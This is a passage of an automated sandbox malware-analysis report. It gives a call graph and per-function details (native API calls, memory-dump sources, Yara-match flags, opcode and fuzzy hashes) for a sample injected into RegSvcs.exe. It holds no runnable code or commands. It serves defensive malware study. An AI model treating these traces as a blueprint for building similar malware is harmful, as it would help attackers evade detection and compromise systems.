NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 100589->100593 100592 419e20 2 API calls 100592->100593 100593->100579 100593->100580 100593->100584 100593->100586 100593->100589 100593->100592 100596 419d10 100593->100596 100599 4085d0 100593->100599 100611 40f5f0 LdrLoadDll NtClose 100593->100611 100612 419d90 LdrLoadDll 100593->100612 100613 419dc0 LdrLoadDll 100593->100613 100614 419e50 LdrLoadDll 100593->100614 100615 4083a0 100593->100615 100631 405f60 LdrLoadDll 100593->100631 100595->100546 100597 419d2c 100596->100597 100598 41af60 LdrLoadDll 100596->100598 100597->100593 100598->100597 100600 4085e6 100599->100600 100632 419880 100600->100632 100602 408771 100602->100593 100603 4085ff 100603->100602 100653 4081a0 100603->100653 100605 4086e5 100605->100602 100606 4083a0 11 API calls 100605->100606 100607 408713 100606->100607 100607->100602 100608 419f00 2 API calls 100607->100608 100609 408748 100608->100609 100609->100602 100610 41a500 2 API calls 100609->100610 100610->100602 100611->100593 100612->100593 100613->100593 100614->100593 100616 4083c9 100615->100616 100693 408310 100616->100693 100619 4083dc 100620 41a500 2 API calls 100619->100620 100621 408467 100619->100621 100624 408462 100619->100624 100701 40f670 100619->100701 100620->100619 100621->100593 100622 41a490 2 API calls 100623 40849a 100622->100623 100623->100621 100625 419d10 LdrLoadDll 100623->100625 100624->100622 100626 4084ff 100625->100626 100626->100621 100705 419d50 100626->100705 100628 408563 100628->100621 100629 414a50 8 API calls 100628->100629 100630 4085b8 100629->100630 100630->100593 100631->100593 100633 41bf90 2 API calls 100632->100633 100634 419897 100633->100634 100660 409310 100634->100660 100636 4198b2 100637 4198f0 100636->100637 100638 4198d9 100636->100638 100640 41bd40 2 API calls 100637->100640 100639 41bdc0 2 API calls 100638->100639 100641 4198e6 100639->100641 100642 41992a 100640->100642 100641->100603 100643 41bd40 2 API calls 100642->100643 100646 419943 100643->100646 100650 419be4 100646->100650 100666 41bd80 100646->100666 100647 419bd0 100648 41bdc0 2 API calls 100647->100648 100649 419bda 100648->100649 100649->100603 100651 41bdc0 2 API calls 100650->100651 100652 419c39 100651->100652 100652->100603 100654 40829f 100653->100654 100655 4081b5 100653->100655 100654->100605 100655->100654 100656 414a50 8 API calls 100655->100656 100658 408222 100656->100658 100657 408249 100657->100605 100658->100657 100659 41bdc0 2 API calls 100658->100659 100659->100657 100661 409335 100660->100661 100662 40acf0 LdrLoadDll 100661->100662 100663 409368 100662->100663 100665 40938d 100663->100665 100669 40cf20 100663->100669 100665->100636 100687 41a580 100666->100687 100670 40cf2c 100669->100670 100671 41a1e0 LdrLoadDll 100670->100671 100672 40cf65 100671->100672 100673 40cf6c 100672->100673 100680 41a220 100672->100680 100673->100665 100677 40cfa7 100678 41a490 2 API calls 100677->100678 100679 40cfca 100678->100679 100679->100665 100681 41a23c 100680->100681 100682 41af60 LdrLoadDll 100680->100682 100686 1472ca0 LdrInitializeThunk 100681->100686 100682->100681 100683 40cf8f 100683->100673 100685 41a810 LdrLoadDll 100683->100685 100685->100677 100686->100683 100688 41af60 LdrLoadDll 100687->100688 100689 41a59c 100688->100689 100692 1472f90 LdrInitializeThunk 100689->100692 100690 419bc9 100690->100647 100690->100650 100692->100690 100694 408328 100693->100694 100695 40acf0 LdrLoadDll 100694->100695 100696 408343 100695->100696 100697 414e50 LdrLoadDll 100696->100697 100698 408353 100697->100698 100699 40835c PostThreadMessageW 100698->100699 100700 408370 100698->100700 100699->100700 100700->100619 100702 40f683 100701->100702 100708 419e90 100702->100708 100706 41af60 LdrLoadDll 100705->100706 100707 419d6c 100706->100707 100707->100628 100709 41af60 LdrLoadDll 100708->100709 100710 419eac 100709->100710 100713 1472dd0 LdrInitializeThunk 100710->100713 100711 40f6ae 100711->100619 100713->100711 100714->100550 100716 41af60 LdrLoadDll 100715->100716 100717 419fdc 100716->100717 100720 1472f30 LdrInitializeThunk 100717->100720 100718 40f4fe 100718->100556 100718->100557 100720->100718 100721->100562 100722->100567 100723->100573 100725 1472ad0 LdrInitializeThunk

                                                          Executed Functions

                                                          Function 0041A410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 41a410-41a459 call 41af60 NtReadFile
                                                          APIs
                                                          • NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID: 1JA$rMA$rMA
                                                          • API String ID: 2738559852-782607585
                                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
                                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                          • Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 231 40acf0-40ad19 call 41cc50 234 40ad1b-40ad1e 231->234 235 40ad1f-40ad2d call 41d070 231->235 238 40ad3d-40ad4e call 41b4a0 235->238 239 40ad2f-40ad3a call 41d2f0 235->239 244 40ad50-40ad64 LdrLoadDll 238->244 245 40ad67-40ad6a 238->245 239->238 244->245
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
                                                          • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                          • Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A35A Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 246 41a35a-41a3b1 call 41af60 NtCreateFile
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 519356f8128ead4ab6967f9f834b5cc5c27a6b5187eb98d1fc20d80f3b898423
                                                          • Instruction ID: db9765c572d52390fb8604434ff9c67f718cda35ab6f8ca037d898e886166646
                                                          • Opcode Fuzzy Hash: 519356f8128ead4ab6967f9f834b5cc5c27a6b5187eb98d1fc20d80f3b898423
                                                          • Instruction Fuzzy Hash: 3601B2B2605218AFCB18CF89DC85EEB77ADEF8C754F158248FA0D97241C630E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A360 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 249 41a360-41a376 250 41a37c-41a3b1 NtCreateFile 249->250 251 41a377 call 41af60 249->251 251->250
                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID:
                                                          • API String ID: 823142352-0
                                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
                                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                          • Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A53B Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 252 41a53b-41a556 253 41a55c-41a57d NtAllocateVirtualMemory 252->253 254 41a557 call 41af60 252->254 254->253
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b519c5b3bf3ed23989de45a446a3f1483a0321d4813e08a8efb2a01f839b3b1f
                                                          • Instruction ID: 2d8d7cd051b59848394cec9ab28889dd1b47d2bdb116ea822d79e9dc0c770f2c
                                                          • Opcode Fuzzy Hash: b519c5b3bf3ed23989de45a446a3f1483a0321d4813e08a8efb2a01f839b3b1f
                                                          • Instruction Fuzzy Hash: C8F0F8B5200108ABDB14DF99CC81EEB77A9EF8C354F158249BA0997241C634E921CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 255 41a540-41a57d call 41af60 NtAllocateVirtualMemory
                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
                                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                          • Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0041A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 264 41a490-41a4b9 call 41af60 NtClose
                                                          APIs
                                                          • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2071471834.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_400000_RegSvcs.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction ID: a008c5d5ec14fa9f5013d94ab86a46559dd82bf248144eb087863a0ac6a31d62
                                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                          • Instruction Fuzzy Hash: F7D01776200218ABD710EB99CC85EE77BACEF48B64F158499BA1C9B242C530FA1086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d32ac8019488bb5a1c47e7ad09664950109953541676ed85faf7c0f0db79a533
                                                          • Instruction ID: 6a48c740830651ba71fb3843b0dae1561d2cf6b1a46a809a983d1384fe53946f
                                                          • Opcode Fuzzy Hash: d32ac8019488bb5a1c47e7ad09664950109953541676ed85faf7c0f0db79a533
                                                          • Instruction Fuzzy Hash: 349002612024010341057158445461A900B97F0301B95C022E1014595DC63589916225
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 531ab7c12b5780a8226491c41a630b20ae502b58f9c01d90e00843883932129c
                                                          • Instruction ID: 6e8294e0003ba358d9d079b2a9be61fbc93dc8be2f088b996581729d56ed6fdc
                                                          • Opcode Fuzzy Hash: 531ab7c12b5780a8226491c41a630b20ae502b58f9c01d90e00843883932129c
                                                          • Instruction Fuzzy Hash: D090023120140902D1807158444464E500697E1301FD5C016A0025659DCB258B5977A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: fd0bb6871394e2b819ea3e36f0928584bf9ef39245a8b992cf0db66f503aafbd
                                                          • Instruction ID: 362910691115ffb64fb96a60824b5446c8f0f22d885d46670f6c01d7405f8dd4
                                                          • Opcode Fuzzy Hash: fd0bb6871394e2b819ea3e36f0928584bf9ef39245a8b992cf0db66f503aafbd
                                                          • Instruction Fuzzy Hash: BE900435311401030105F55C074450F5047D7F53513D5C033F1015555CD731CD715331
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: ed0a932982c3c1807a137a98b1119fb7e29c7d68a7edf8d322418fd59e1c6aef
                                                          • Instruction ID: 8cb5f07ae6ce43075541a31390d07ec6391466ed1a5703db5c605a0dee56ccbc
                                                          • Opcode Fuzzy Hash: ed0a932982c3c1807a137a98b1119fb7e29c7d68a7edf8d322418fd59e1c6aef
                                                          • Instruction Fuzzy Hash: AB90022921340102D1807158544860E500697E1302FD5D416A001555DCCA2589695321
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 23d36ac94e2676a61c16d3f02cf7eb79c6cbec6fc68881098d636f8180dbb925
                                                          • Instruction ID: 769963c6549876a467b31616517cc202a2fe55bb01dee99e5f8ff87fda3dc8ee
                                                          • Opcode Fuzzy Hash: 23d36ac94e2676a61c16d3f02cf7eb79c6cbec6fc68881098d636f8180dbb925
                                                          • Instruction Fuzzy Hash: 0990022130140103D1407158545860A9006E7F1301F95D012E0414559CDA2589565322
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 46fac27f0789079ceeb552311d9d7330db4c2e63c6bb8fee0db35b1868cee29b
                                                          • Instruction ID: f1e594038b7d327e30be386539b61e58b881e5fbc2d68183ef21802f0c308ccc
                                                          • Opcode Fuzzy Hash: 46fac27f0789079ceeb552311d9d7330db4c2e63c6bb8fee0db35b1868cee29b
                                                          • Instruction Fuzzy Hash: 54900221242442525545B158444450B9007A7F03417D5C013A1414955CC6369956D721
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 185688481b38bc3a8683deb16b14006ec44ed57040ceee148c35744d3a2ff1d0
                                                          • Instruction ID: 0e39e6b9294f95f18bce7c457b3e2a1cea512539961eeff31a91f9c68ce3209d
                                                          • Opcode Fuzzy Hash: 185688481b38bc3a8683deb16b14006ec44ed57040ceee148c35744d3a2ff1d0
                                                          • Instruction Fuzzy Hash: 4B90023120140513D1117158454470B500A97E0341FD5C413A042455DDD7668A52A221
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: b1c4b9ee07d9d5f4dc170aae1fe22939b28036dad3b3f75c7ccb7754df574fba
                                                          • Instruction ID: ca2950ffc6f7621a663dd4fd892a815da482a9c048f938f966eb6cd95ef0a23f
                                                          • Opcode Fuzzy Hash: b1c4b9ee07d9d5f4dc170aae1fe22939b28036dad3b3f75c7ccb7754df574fba
                                                          • Instruction Fuzzy Hash: D590023120148902D1107158844474E500697E0301F99C412A442465DDC7A589917221
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 20bb73b7a23b5a2d0208505247fa2d5663135ebd2a68498aa209479c20e5c866
                                                          • Instruction ID: a66e744e6fb02c7f4d1949d778de9463f0c4541897a4f753819d73a3b9142453
                                                          • Opcode Fuzzy Hash: 20bb73b7a23b5a2d0208505247fa2d5663135ebd2a68498aa209479c20e5c866
                                                          • Instruction Fuzzy Hash: 6490023120140502D1007598544864A500697F0301F95D012A502455AEC77589916231
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 3c8db66b05abaea61318c39763711b72be30e3faa9048f66ade891a1c09ab9da
                                                          • Instruction ID: cb1775b64bf985bcc63ee529e9431871e27ac4029ee32e2a31dfe45afe52768e
                                                          • Opcode Fuzzy Hash: 3c8db66b05abaea61318c39763711b72be30e3faa9048f66ade891a1c09ab9da
                                                          • Instruction Fuzzy Hash: E590026134140542D10071584454B0A5006D7F1301F95C016E1064559DC729CD526226
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 2b25f422768ede1552d6189be4f2523bca4a0b2839a5553a4e24de699d6531cb
                                                          • Instruction ID: 9c861356ab2fdd55ef4a270fe13e8d3beda3f78dae473f981c3ab5a5e1bb64ca
                                                          • Opcode Fuzzy Hash: 2b25f422768ede1552d6189be4f2523bca4a0b2839a5553a4e24de699d6531cb
                                                          • Instruction Fuzzy Hash: 9B900221211C0142D20075684C54B0B500697E0303F95C116A0154559CCA2589615621
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5fafedba3645dd11daa81fa7e5aef66cbccee81dde4d3766effa1e4a6d778b4f
                                                          • Instruction ID: 2d73414727c8140b43a705b0351c6ce30e5e9b7955d37095bbd15334aaf333a1
                                                          • Opcode Fuzzy Hash: 5fafedba3645dd11daa81fa7e5aef66cbccee81dde4d3766effa1e4a6d778b4f
                                                          • Instruction Fuzzy Hash: 2E90023120180502D1007158485470F500697E0302F95C012A116455ADC73589516671
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 84145c00a1989d57d6111acc3cc9501889ac743ed26a0ab0b01ac75c217b8a33
                                                          • Instruction ID: f2eed31f4c8dff219cf296b30a80327dc53c4ee3c67db612f179319cdb67722f
                                                          • Opcode Fuzzy Hash: 84145c00a1989d57d6111acc3cc9501889ac743ed26a0ab0b01ac75c217b8a33
                                                          • Instruction Fuzzy Hash: F69002216014014241407168888490A9006BBF1311795C122A0998555DC66989655765
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: c9cd22e34747e6a844e4b25c9d7454a003a121603a7b6facd35878111b69cf39
                                                          • Instruction ID: e35f9b27617b1a2c275a5acfb2c398e28e8aeda82c9260b86cccaf4b265f0d2d
                                                          • Opcode Fuzzy Hash: c9cd22e34747e6a844e4b25c9d7454a003a121603a7b6facd35878111b69cf39
                                                          • Instruction Fuzzy Hash: D490022160140602D1017158444461A500B97E0341FD5C023A102455AECB358A92A231
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01472EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2072443404.0000000001400000.00000040.00001000.00020000.00000000.sdmp, Offset: 01400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1400000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 488371fdd16e3e90221b482ba5e32a07e0d6d30abf70cbeb0639671bd2c77f31
                                                          • Instruction ID: d8c970cc1a03cb9231986f108216e85dff07bc3af085c29bf4f53b4ff2de25f5
                                                          • Opcode Fuzzy Hash: 488371fdd16e3e90221b482ba5e32a07e0d6d30abf70cbeb0639671bd2c77f31
                                                          • Instruction Fuzzy Hash: C990027120140502D1407158444474A500697E0301F95C012A5064559EC7698ED56765
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
